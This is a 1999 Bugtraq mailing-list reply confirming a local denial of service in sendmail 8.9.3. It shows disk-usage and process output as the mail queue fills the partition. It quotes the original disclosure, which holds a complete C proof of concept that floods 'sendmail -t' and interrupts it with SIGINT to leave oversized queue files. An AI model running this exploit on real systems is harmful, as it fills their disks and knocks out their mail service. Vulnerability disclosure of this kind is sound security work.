Re: Possible local DoS in sendmail

From: KuRuPTioN (kuruptionat_private)
Date: Thu Apr 01 1999 - 11:41:41 PST

  • Next message: Stefano Torricella: "tcpd remarks warning" 

    Well, this is very interesting... this is what I found my running this
binary for 30 seconds =)

Before:

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251   87681   199909     30%   /
# ps auwx | grep sendmail
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
accepting connections on port 25
# ls -l /var/spool/mqueue
total 0
#

After (30 seconds running):

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  107548   180042     37%   /
(not too bad but another 30 seconds later another df)

Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  146235   141355     51%   /

# ps auwx | grep sendmail
mail     17144 70.5  0.4  1348   820  p1 R   11:35   0:48
/usr/sbin/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
accepting connections on port 25
(sendmail kindly using 70% of my CPU)

# ls -l /var/spool/mqueue
total 115854
-rw-------   1 mail     mail     118169600 Apr  1 11:37 dfLAA17144
-rw-------   1 mail     mail            0 Apr  1 11:35 qfLAA17144
-rw-------   1 mail     mail            0 Apr  1 11:35 xfLAA17144

(once again a df)
# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  224734    62856     78%   /

and once the hard drive becomes filled sendmail stops accepting connections
since it has no temp space.

# df /
Filesystem         1024-blocks  Used Available Capacity Mounted on
/dev/hda1             303251  287590        0    100%   /
# ps auwx | grep sendmail
mail     17144 68.5  0.4  1348   820  p1 R   11:35   2:33
/usr/wrapped/sendmail -t
root      1427  0.0  0.4  1324   816  ?  S  Mar 27   0:00 sendmail:
rejecting connections on port 25: min free: 100
#

People, this is no april fools joke =)

Raymond T Sundland
MCSE, MCP, MCP+Internet
PGP Key: finger pgpat_private

|-----Original Message-----
|From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of Lukasz
|Luzar
|Sent: Thursday, April 01, 1999 9:00 AM
|To: BUGTRAQat_private
|Subject: Possible local DoS in sendmail
|
|
|Hi,
|It seems that sendmail ran with -t option does NOT block SIGINT ...
|In that moment while we are sending data to its stdin, when we will press
|CTRL-C process is being killed, but in queue rests unfinished letter.
|It stays there quite long - long enought to fullfill partition on
|disk where
|/var/spool/mqueue resides.
|When it happends, sendmail doesn't allow new connections - so it is a kind
|of DoS attack for this service.
|It has been tested on all new versions on sendmail up to current (8.9.3).
|
|Example ...
|
| --- CUT HERE ----
| #include <stdio.h>
| #include <unistd.h>
| #include <signal.h>
| #include <sys/wait.h>
|
| #define DELAY 5              /* time in seconds needed to reach
|                                 MaxMessageSize limit */
| #define SM_PATH "/usr/sbin/sendmail -t"
|
| void main()
| {
| 	FILE	*fd;
| 	int	pid;
|
| 	for(;;) {
| 		if(( pid = fork()) == 0) {
| 			setpgrp();
| 			if(( fd = popen( SM_PATH, "w")) == NULL)
| 				fprintf( stderr, "popen error\n");
|
| 			for(;;) fputc( 'A', fd);
| 		} else {
| 			sleep( DELAY);
| 			kill( (-1) * pid, SIGINT);
| 			fprintf( stdout, "next\n");
| 			wait( NULL);
| 		}
| 	}
| }
|--- CUT HERE ---
|
|Regards,
|
|---
|Lukasz Luzar                               K.K.I.
|http://noname.kki.krakow.pl/           lluzarat_private
|

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:19 PDT